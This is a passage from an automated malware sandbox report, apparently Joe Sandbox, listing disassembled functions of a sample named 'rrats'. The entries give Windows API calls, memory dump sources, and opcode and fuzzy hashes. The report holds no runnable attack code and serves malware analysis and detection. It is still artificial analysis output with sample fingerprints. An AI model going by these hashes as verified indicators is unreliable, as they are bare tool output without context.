                                                              • Instruction Fuzzy Hash: 714168B0905B419EE724CF798885AE7FBE5BF19300F54492ED5FE83282CB316654DB10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9beb1f1dd564a1f5a85941504df7241389991e0d412ed4b1007bee93af85dee3
                                                              • Instruction ID: 7e9003a1a61ed48475332f1612a3ccb6628f78654334a2b08ea9166d3db3cb6f
                                                              • Opcode Fuzzy Hash: 9beb1f1dd564a1f5a85941504df7241389991e0d412ed4b1007bee93af85dee3
                                                              • Instruction Fuzzy Hash: 8621B1B1E40255ABDB149F79CC41AEA77A8FB19714F14023EE516EB781D7B09E00C6A8
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBB098
                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 73a5b0466e4787edf03a81929f299e0877f41f5d56fc2b816c4237ab1cf318f1
                                                              • Instruction ID: 7b94e55d2d1876aebde0e1fccbc3e4102df2a8aefeaf04ebcdc1ced736083634
                                                              • Opcode Fuzzy Hash: 73a5b0466e4787edf03a81929f299e0877f41f5d56fc2b816c4237ab1cf318f1
                                                              • Instruction Fuzzy Hash: BD316B75C0024AAECF15DFA9D851AEEBBB4AF09304F14449EE80AB7242D775AF04DB61
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CCACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                              • Instruction ID: 32c009f9b490696ba17fd7d7969eb92c8338e2c2280fb467e6e42d83479ae3e4
                                                              • Opcode Fuzzy Hash: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                              • Instruction Fuzzy Hash: 84113A33A012396F8F219F1DDC88F5A7395EB843287164225FD26EB244D731DD0187D2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                              • Instruction ID: d8b47f7235fbd6ecf5f3cb8216032b308d2a50839162fba735ace37f78154178
                                                              • Opcode Fuzzy Hash: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                              • Instruction Fuzzy Hash: 1801A933D00526ABCF11AB68CC82ADEB731FF8A754F054215F813B7151DA348D00D7A0
                                                              APIs
                                                                • Part of subcall function 00CCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CCB177
                                                              • _free.LIBCMT ref: 00CCC4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: 872a585359015c3ddd06e0a6c8a157f4de8b4457ce9ebc01a2bedffffbb2e35f
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: 4A01D6726003056BE335CE69D885E6AFBEDEB85370F25451DE59893281EA30A905C764
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CCB177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                              • Instruction ID: 7e59f13d82fe2537bf3b66a083ba31c1ed47a466a1898d9e4eca3c030cafff26
                                                              • Opcode Fuzzy Hash: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                              • Instruction Fuzzy Hash: 97F0543250556567DB215AA2EC1BF9F7748EB41770F1D8219F81896190CB21DE0196E0
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CC3C3F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                              • Instruction ID: ef1a07cb5b562f6e9f0231cac67ffb6d77b70a2be5b11eb45af418ff1f576b68
                                                              • Opcode Fuzzy Hash: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                              • Instruction Fuzzy Hash: 57F0A7362002969FCF124E69FC04F9E7799EF01B60714C229FA25E7190DB31DB20D7A0
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                              • Instruction ID: e89f3fcff941e8464eb54fcee098f40e37034a79d347675917e07362885205e9
                                                              • Opcode Fuzzy Hash: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                              • Instruction Fuzzy Hash: D3E06D3960622566EB7126A6DC09F9F76489B817B4F15012DEC2896592CF21CE0592E1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA5AC2
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                              • Instruction ID: 88471ded6a780e408572fee993c4f5c9d3ac52ae9b0f5c1d289840b6051a24f5
                                                              • Opcode Fuzzy Hash: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                              • Instruction Fuzzy Hash: C3018C30810694DAD729E7B8C0417DEFBB49F64308F60848EA85653283CBB41B08E7A2
                                                              APIs
                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                • Part of subcall function 00CAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                              • Instruction ID: c765d1c8c006efb9ed904824350b9851f5e24886d95b075237d32bd962d63aaf
                                                              • Opcode Fuzzy Hash: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                              • Instruction Fuzzy Hash: C5F08231409791ABCB225BB48904BCBBB906F1B339F048A4AF1FD52196C37554A4EB23
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CB0E3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 70a640acfef662f8083a73cc77403ffc70164b952ab47a18e747d8537e916d56
                                                              • Instruction ID: 730de0e4c3629d45d0d21c6d4d8cebfffe0f1c59a2a67c81a4f5bb9175081c69
                                                              • Opcode Fuzzy Hash: 70a640acfef662f8083a73cc77403ffc70164b952ab47a18e747d8537e916d56
                                                              • Instruction Fuzzy Hash: D7D02B306010D517DF11372828757FF26068FC7324F0C0066F8855B283CF544C82B272
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                • Part of subcall function 00CBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 9823f9a76a02dd93281216a88ea2d64a764b52b9537f2f54ae846c123885c8bf
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: E1D0C9B1210209BADF466B628C129EE7A99EB00740F048125B882D6192EEB1DA10A666
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 00CBE5E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                              • Instruction ID: 265014ab908f6dca6f72a4b85c5ac1070d6f8820e29aa84d4598f24a869597c4
                                                              • Opcode Fuzzy Hash: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                              • Instruction Fuzzy Hash: 7FD012B81C43409FE712EFA99846BD973D4B724F05F900101F15DD16D5DB64C5C5D629
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CB1B3E), ref: 00CBDD92
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                              • Instruction ID: 12b5eb7eff08003f2735a32d56aced9c7f575658b36ca922171bd21c93263e1b
                                                              • Opcode Fuzzy Hash: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                              • Instruction Fuzzy Hash: E8D09E31144300BADA112B51DD06F4F7AA6AB88B04F004554B289740F186729D35EB12
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,00CA97BE), ref: 00CA98C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                              • Instruction ID: e0061b98b2a3dd43ffaf72d94aa74fb641a62122e6ec41cc26dad2d151fbc0d3
                                                              • Opcode Fuzzy Hash: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                              • Instruction Fuzzy Hash: 94C00238404246968E219B24988A1997722EE533AABB49695D079890E1C33ACE97EA11
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                              • Instruction ID: fe7e8c9b427df1b28e24c1f43f0e3609bec4ba6047491a66248ca1622f4542c0
                                                              • Opcode Fuzzy Hash: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                              • Instruction Fuzzy Hash: 68B012E525C201BC3504114E2C42CFB010DC0C5F10730C43FFC05C05C1E840EC006472
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                              • Instruction ID: 51d113a6830c8ce763d4780165ac93a2d714d569c59bb190c98dec31d6078a4b
                                                              • Opcode Fuzzy Hash: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                              • Instruction Fuzzy Hash: 13B012E525C201AC3504514E2C42DFB014DC0C8F10730C03FF809C02C1E840AC006532
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                              • Instruction ID: 7ab3402aedabbc2ea2fa9245c16bd776c11028eb5dfa25057fd546917cf3d78b
                                                              • Opcode Fuzzy Hash: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                              • Instruction Fuzzy Hash: 6DB092A1258201AC2504520A2802DBA014DC085F10730C03AB809C02C1E840AC046472
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
